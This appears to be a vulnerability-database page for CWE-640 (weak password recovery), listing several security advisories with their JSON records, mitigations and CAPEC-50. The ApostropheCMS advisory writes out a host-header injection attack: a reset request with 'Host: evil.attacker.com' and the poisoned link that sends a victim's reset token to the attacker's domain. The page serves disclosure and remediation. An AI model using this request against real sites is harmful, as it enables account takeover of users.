CWE-640
Allowed-with-ReviewWeak Password Recovery Mechanism for Forgotten Password
Abstraction: Base · Status: Incomplete
The product contains a mechanism for users to recover or change their passwords without knowing the original password, but the mechanism is weak.
393 vulnerabilities reference this CWE, most recent first.
GHSA-FMR2-M7GC-577W
Vulnerability from github – Published: 2026-02-22 00:31 – Updated: 2026-02-26 15:31A security flaw has been discovered in funadmin up to 7.1.0-rc4. Affected by this issue is the function repass of the file app/frontend/controller/Member.php. Performing a manipulation of the argument forget_code/vercode results in weak password recovery. Remote exploitation of the attack is possible. The attack's complexity is rated as high. The exploitation is known to be difficult. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "funadmin/funadmin"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "7.1.0-rc4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-2895"
],
"database_specific": {
"cwe_ids": [
"CWE-640"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-26T15:31:41Z",
"nvd_published_at": "2026-02-21T23:15:59Z",
"severity": "LOW"
},
"details": "A security flaw has been discovered in funadmin up to 7.1.0-rc4. Affected by this issue is the function repass of the file app/frontend/controller/Member.php. Performing a manipulation of the argument forget_code/vercode results in weak password recovery. Remote exploitation of the attack is possible. The attack\u0027s complexity is rated as high. The exploitation is known to be difficult. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.",
"id": "GHSA-fmr2-m7gc-577w",
"modified": "2026-02-26T15:31:41Z",
"published": "2026-02-22T00:31:01Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2895"
},
{
"type": "WEB",
"url": "https://github.com/I4m6da/CVE/issues/2"
},
{
"type": "PACKAGE",
"url": "https://github.com/funadmin/funadmin"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.347206"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.347206"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.753971"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "funadmin has Weak Password Recovery Mechanism for Forgotten Password"
}
GHSA-FQC6-Q4RQ-Q3M4
Vulnerability from github – Published: 2023-06-23 18:30 – Updated: 2024-04-04 05:07This issue was addressed with improved state management. This issue is fixed in iOS 16.5 and iPadOS 16.5, macOS Ventura 13.4, watchOS 9.5, tvOS 16.5. An app firewall setting may not take effect after exiting the Settings app
{
"affected": [],
"aliases": [
"CVE-2023-28202"
],
"database_specific": {
"cwe_ids": [
"CWE-640"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-06-23T18:15:11Z",
"severity": "MODERATE"
},
"details": "This issue was addressed with improved state management. This issue is fixed in iOS 16.5 and iPadOS 16.5, macOS Ventura 13.4, watchOS 9.5, tvOS 16.5. An app firewall setting may not take effect after exiting the Settings app",
"id": "GHSA-fqc6-q4rq-q3m4",
"modified": "2024-04-04T05:07:20Z",
"published": "2023-06-23T18:30:23Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-28202"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/HT213757"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/HT213758"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/HT213761"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/HT213764"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-FR7C-JV5V-7Q4H
Vulnerability from github – Published: 2022-05-13 01:47 – Updated: 2022-05-13 01:47Azure AD Connect Password writeback, if misconfigured during enablement, allows an attacker to reset passwords and gain unauthorized access to arbitrary on-premises AD privileged user accounts aka "Azure AD Connect Elevation of Privilege Vulnerability."
{
"affected": [],
"aliases": [
"CVE-2017-8613"
],
"database_specific": {
"cwe_ids": [
"CWE-640"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-06-29T13:29:00Z",
"severity": "HIGH"
},
"details": "Azure AD Connect Password writeback, if misconfigured during enablement, allows an attacker to reset passwords and gain unauthorized access to arbitrary on-premises AD privileged user accounts aka \"Azure AD Connect Elevation of Privilege Vulnerability.\"",
"id": "GHSA-fr7c-jv5v-7q4h",
"modified": "2022-05-13T01:47:39Z",
"published": "2022-05-13T01:47:39Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-8613"
},
{
"type": "WEB",
"url": "https://technet.microsoft.com/library/security/4033453"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/99294"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-FV4F-72J5-C8MX
Vulnerability from github – Published: 2025-09-11 21:31 – Updated: 2025-09-11 21:31Daikin Security Gateway is vulnerable to an authorization bypass through a user-controlled key vulnerability that could allow an attacker to bypass authentication. An unauthorized attacker could access the system without prior credentials.
{
"affected": [],
"aliases": [
"CVE-2025-10127"
],
"database_specific": {
"cwe_ids": [
"CWE-640"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-09-11T20:15:33Z",
"severity": "HIGH"
},
"details": "Daikin Security Gateway is vulnerable to an authorization bypass through\n a user-controlled key vulnerability that could allow an attacker to \nbypass authentication. An unauthorized attacker could access the system \nwithout prior credentials.",
"id": "GHSA-fv4f-72j5-c8mx",
"modified": "2025-09-11T21:31:55Z",
"published": "2025-09-11T21:31:55Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-10127"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-254-10"
},
{
"type": "WEB",
"url": "https://www.daikin.eu/en_us/customers/support.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-FWGH-82PJ-8VP9
Vulnerability from github – Published: 2023-01-10 21:30 – Updated: 2025-05-30 18:30In Talend Administration Center 7.3.1.20200219 before TAC-15950, the Forgot Password feature provides different error messages for invalid reset attempts depending on whether the email address is associated with any account. This allows remote attackers to enumerate accounts via a series of requests.
{
"affected": [],
"aliases": [
"CVE-2022-30332"
],
"database_specific": {
"cwe_ids": [
"CWE-203",
"CWE-640"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-01-10T21:15:00Z",
"severity": "MODERATE"
},
"details": "In Talend Administration Center 7.3.1.20200219 before TAC-15950, the Forgot Password feature provides different error messages for invalid reset attempts depending on whether the email address is associated with any account. This allows remote attackers to enumerate accounts via a series of requests.",
"id": "GHSA-fwgh-82pj-8vp9",
"modified": "2025-05-30T18:30:44Z",
"published": "2023-01-10T21:30:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-30332"
},
{
"type": "WEB",
"url": "https://cds.thalesgroup.com/en/tcs-cert/CVE-2022-30332"
},
{
"type": "WEB",
"url": "https://cwe.mitre.org/data/definitions/204.html"
},
{
"type": "WEB",
"url": "https://excellium-services.com/cert-xlm-advisory/CVE-2022-30332"
},
{
"type": "WEB",
"url": "https://help.talend.com/r/62tbPt7y~tPTxAB7y7KpeQ/H45WqEF32geNEZiGJnRwmw"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-G32F-CM3Q-JCMH
Vulnerability from github – Published: 2022-05-24 17:22 – Updated: 2022-05-24 17:22In NGINX Controller 3.0.0-3.4.0, recovery code required to change a user's password is transmitted and stored in the database in plain text, which allows an attacker who can intercept the database connection or have read access to the database, to request a password reset using the email address of another registered user then retrieve the recovery code.
{
"affected": [],
"aliases": [
"CVE-2020-5899"
],
"database_specific": {
"cwe_ids": [
"CWE-640"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-07-01T15:15:00Z",
"severity": "MODERATE"
},
"details": "In NGINX Controller 3.0.0-3.4.0, recovery code required to change a user\u0027s password is transmitted and stored in the database in plain text, which allows an attacker who can intercept the database connection or have read access to the database, to request a password reset using the email address of another registered user then retrieve the recovery code.",
"id": "GHSA-g32f-cm3q-jcmh",
"modified": "2022-05-24T17:22:15Z",
"published": "2022-05-24T17:22:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-5899"
},
{
"type": "WEB",
"url": "https://support.f5.com/csp/article/K25434422"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-G5MP-GQVH-992Q
Vulnerability from github – Published: 2025-07-22 03:30 – Updated: 2025-07-22 03:30A vulnerability classified as problematic was found in jshERP up to 3.5. Affected by this vulnerability is an unknown functionality of the file /jshERP-boot/user/updatePwd. The manipulation leads to weak password recovery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
{
"affected": [],
"aliases": [
"CVE-2025-7948"
],
"database_specific": {
"cwe_ids": [
"CWE-640"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-07-22T01:15:23Z",
"severity": "MODERATE"
},
"details": "A vulnerability classified as problematic was found in jshERP up to 3.5. Affected by this vulnerability is an unknown functionality of the file /jshERP-boot/user/updatePwd. The manipulation leads to weak password recovery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.",
"id": "GHSA-g5mp-gqvh-992q",
"modified": "2025-07-22T03:30:34Z",
"published": "2025-07-22T03:30:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7948"
},
{
"type": "WEB",
"url": "https://github.com/jishenghua/jshERP/issues/123"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.317089"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.317089"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.619277"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-G83R-7CWR-H2JW
Vulnerability from github – Published: 2025-05-23 15:31 – Updated: 2026-04-28 21:35Weak Password Recovery Mechanism for Forgotten Password vulnerability in Gilblas Ngunte Possi PSW Front-end Login & Registration allows Password Recovery Exploitation. This issue affects PSW Front-end Login & Registration: from n/a through 1.13.
{
"affected": [],
"aliases": [
"CVE-2025-47646"
],
"database_specific": {
"cwe_ids": [
"CWE-640"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-05-23T13:15:41Z",
"severity": "CRITICAL"
},
"details": "Weak Password Recovery Mechanism for Forgotten Password vulnerability in Gilblas Ngunte Possi PSW Front-end Login \u0026amp; Registration allows Password Recovery Exploitation. This issue affects PSW Front-end Login \u0026amp; Registration: from n/a through 1.13.",
"id": "GHSA-g83r-7cwr-h2jw",
"modified": "2026-04-28T21:35:39Z",
"published": "2025-05-23T15:31:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47646"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/wordpress/plugin/psw-login-and-registration/vulnerability/wordpress-psw-front-end-login-registration-1-12-broken-authentication-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-GF43-24G3-5HW2
Vulnerability from github – Published: 2026-05-14 18:27 – Updated: 2026-06-12 22:02Summary
ApostropheCMS's password reset flow constructs the reset URL using req.hostname,
which is derived directly from the attacker-controlled HTTP Host header when
apos.baseUrl is not explicitly configured. An unauthenticated attacker who knows
a victim's email address can send a crafted reset request that causes the application
to email the victim a reset link pointing to the attacker's domain. When the victim
clicks the link, the valid reset token is delivered to the attacker, enabling full
account takeover.
Affected Component
modules/@apostrophecms/login/index.js — resetRequest route
Precondition: passwordReset: true is set and apos.baseUrl is not configured.
Vulnerability Details
The setPrefixUrls middleware (i18n layer) builds req.baseUrl using req.hostname:
// Simplified from i18n middleware
req.baseUrl = `${req.protocol}://${req.hostname}`;
req.absoluteUrl = req.baseUrl + req.url;
The resetRequest handler then passes this tainted value directly into URL construction:
const parsed = new URL(
req.absoluteUrl, // ← tainted by attacker's Host header
self.apos.baseUrl
? undefined
: `${req.protocol}://${req.hostname}${port}` // ← also tainted
);
parsed.pathname = '/login';
parsed.searchParams.append('reset', reset); // real, valid token
parsed.searchParams.append('email', user.email);
await self.email(..., { url: parsed.toString() }, ...);
// Email sent to victim with URL pointing to attacker-controlled domain
When apos.baseUrl is configured, it is used unconditionally and the attacker's
Host header is ignored — that path is not vulnerable.
Attack Scenario
- Attacker identifies a valid user email (e.g. from the site's public interface).
- Attacker sends:
POST /api/v1/login/reset-request
Host: evil.attacker.com
Content-Type: application/json
{"email": "victim@example.com"}
- The application emails the victim:
Click here to reset your password:
http://evil.attacker.com/login?reset=TOKEN&email=victim@example.com
- Victim clicks the link; attacker's server captures
TOKEN. - Attacker calls the real target's reset endpoint with the captured token and sets a new password — full account takeover.
Preconditions
passwordReset: trueconfigured in login module options (opt-in)apos.baseUrlis not set (common in development and some production deployments)- Attacker knows or can enumerate a valid account email
Impact
Full account takeover of any account whose email address is known to the attacker. No authentication or interaction beyond sending a single HTTP request is required from the attacker. The victim need only click a link in a legitimate-looking password reset email from their own site.
Remediation
Operators (immediate): Always set apos.baseUrl in your configuration:
// app.js or module configuration
modules: {
'@apostrophecms/express': {
options: {
baseUrl: 'https://yourdomain.com'
}
}
}
Framework fix (recommended): The resetRequest route should refuse to proceed
if apos.baseUrl is not configured, rather than falling back to the tainted
req.hostname. Example:
// In resetRequest handler
if (!self.apos.baseUrl) {
throw self.apos.error(
'invalid',
'apos.baseUrl must be configured to enable password reset'
);
}
const parsed = new URL(self.loginUrl(), self.apos.baseUrl);
This eliminates the attacker-controlled input entirely from the URL construction path.
References
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "apostrophe"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "4.29.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-45013"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-640"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-14T18:27:12Z",
"nvd_published_at": "2026-06-12T21:16:22Z",
"severity": "HIGH"
},
"details": "## Summary\n\nApostropheCMS\u0027s password reset flow constructs the reset URL using `req.hostname`, \nwhich is derived directly from the attacker-controlled HTTP `Host` header when \n`apos.baseUrl` is not explicitly configured. An unauthenticated attacker who knows \na victim\u0027s email address can send a crafted reset request that causes the application \nto email the victim a reset link pointing to the attacker\u0027s domain. When the victim \nclicks the link, the valid reset token is delivered to the attacker, enabling full \naccount takeover.\n\n## Affected Component\n\n`modules/@apostrophecms/login/index.js` \u2014 `resetRequest` route \nPrecondition: `passwordReset: true` is set **and** `apos.baseUrl` is not configured.\n\n## Vulnerability Details\n\nThe `setPrefixUrls` middleware (i18n layer) builds `req.baseUrl` using `req.hostname`:\n\n```js\n// Simplified from i18n middleware\nreq.baseUrl = `${req.protocol}://${req.hostname}`;\nreq.absoluteUrl = req.baseUrl + req.url;\n```\n\nThe `resetRequest` handler then passes this tainted value directly into URL construction:\n\n```js\nconst parsed = new URL(\n req.absoluteUrl, // \u2190 tainted by attacker\u0027s Host header\n self.apos.baseUrl\n ? undefined\n : `${req.protocol}://${req.hostname}${port}` // \u2190 also tainted\n);\nparsed.pathname = \u0027/login\u0027;\nparsed.searchParams.append(\u0027reset\u0027, reset); // real, valid token\nparsed.searchParams.append(\u0027email\u0027, user.email);\nawait self.email(..., { url: parsed.toString() }, ...);\n// Email sent to victim with URL pointing to attacker-controlled domain\n```\n\nWhen `apos.baseUrl` is configured, it is used unconditionally and the attacker\u0027s \n`Host` header is ignored \u2014 that path is **not** vulnerable.\n\n## Attack Scenario\n\n1. Attacker identifies a valid user email (e.g. from the site\u0027s public interface).\n2. Attacker sends:\n```\n POST /api/v1/login/reset-request\n Host: evil.attacker.com\n Content-Type: application/json\n\n {\"email\": \"victim@example.com\"}\n```\n3. The application emails the victim:\n```\n Click here to reset your password:\n http://evil.attacker.com/login?reset=TOKEN\u0026email=victim@example.com\n```\n4. Victim clicks the link; attacker\u0027s server captures `TOKEN`.\n5. Attacker calls the real target\u0027s reset endpoint with the captured token and \n sets a new password \u2014 full account takeover.\n\n## Preconditions\n\n- `passwordReset: true` configured in login module options (opt-in)\n- `apos.baseUrl` is **not** set (common in development and some production deployments)\n- Attacker knows or can enumerate a valid account email\n\n## Impact\n\nFull account takeover of any account whose email address is known to the attacker. \nNo authentication or interaction beyond sending a single HTTP request is required \nfrom the attacker. The victim need only click a link in a legitimate-looking \npassword reset email from their own site.\n\n## Remediation\n\n**Operators (immediate):** Always set `apos.baseUrl` in your configuration:\n\n```js\n// app.js or module configuration\nmodules: {\n \u0027@apostrophecms/express\u0027: {\n options: {\n baseUrl: \u0027https://yourdomain.com\u0027\n }\n }\n}\n```\n\n**Framework fix (recommended):** The `resetRequest` route should refuse to proceed \nif `apos.baseUrl` is not configured, rather than falling back to the tainted \n`req.hostname`. Example:\n\n```js\n// In resetRequest handler\nif (!self.apos.baseUrl) {\n throw self.apos.error(\n \u0027invalid\u0027,\n \u0027apos.baseUrl must be configured to enable password reset\u0027\n );\n}\nconst parsed = new URL(self.loginUrl(), self.apos.baseUrl);\n```\n\nThis eliminates the attacker-controlled input entirely from the URL construction path.\n\n## References\n\n- [OWASP: Host Header Injection](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Host_Header_Injection)\n- [CWE-640: Weak Password Recovery Mechanism for Forgotten Password](https://cwe.mitre.org/data/definitions/640.html)",
"id": "GHSA-gf43-24g3-5hw2",
"modified": "2026-06-12T22:02:13Z",
"published": "2026-05-14T18:27:12Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-gf43-24g3-5hw2"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45013"
},
{
"type": "PACKAGE",
"url": "https://github.com/apostrophecms/apostrophe"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Apostrophe has a Weak Password Recovery Mechanism for Forgotten Password and Improper Input Validation"
}
GHSA-GGP6-PC6F-GH53
Vulnerability from github – Published: 2021-12-10 00:00 – Updated: 2023-08-08 15:31An Incorrect Access Control vulnerability exists in Premiumdatingscript 4.2.7.7 via the password change procedure in requests\user.php.
{
"affected": [],
"aliases": [
"CVE-2021-41694"
],
"database_specific": {
"cwe_ids": [
"CWE-640"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-12-09T16:15:00Z",
"severity": "CRITICAL"
},
"details": "An Incorrect Access Control vulnerability exists in Premiumdatingscript 4.2.7.7 via the password change procedure in requests\\user.php.",
"id": "GHSA-ggp6-pc6f-gh53",
"modified": "2023-08-08T15:31:24Z",
"published": "2021-12-10T00:00:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41694"
},
{
"type": "WEB",
"url": "https://www.chudamax.com/posts/multiple-vulnerabilities-in-belloo-dating-script"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
Make sure that all input supplied by the user to the password recovery mechanism is thoroughly filtered and validated.
Mitigation
Do not use standard weak security questions and use several security questions.
Mitigation
Make sure that there is throttling on the number of incorrect answers to a security question. Disable the password recovery functionality after a certain (small) number of incorrect guesses.
Mitigation
Require that the user properly answers the security question prior to resetting their password and sending the new password to the e-mail address of record.
Mitigation
Never allow the user to control what e-mail address the new password will be sent to in the password recovery mechanism.
Mitigation
Assign a new temporary password rather than revealing the original password.
CAPEC-50: Password Recovery Exploitation
An attacker may take advantage of the application feature to help users recover their forgotten passwords in order to gain access into the system with the same privileges as the original user. Generally password recovery schemes tend to be weak and insecure.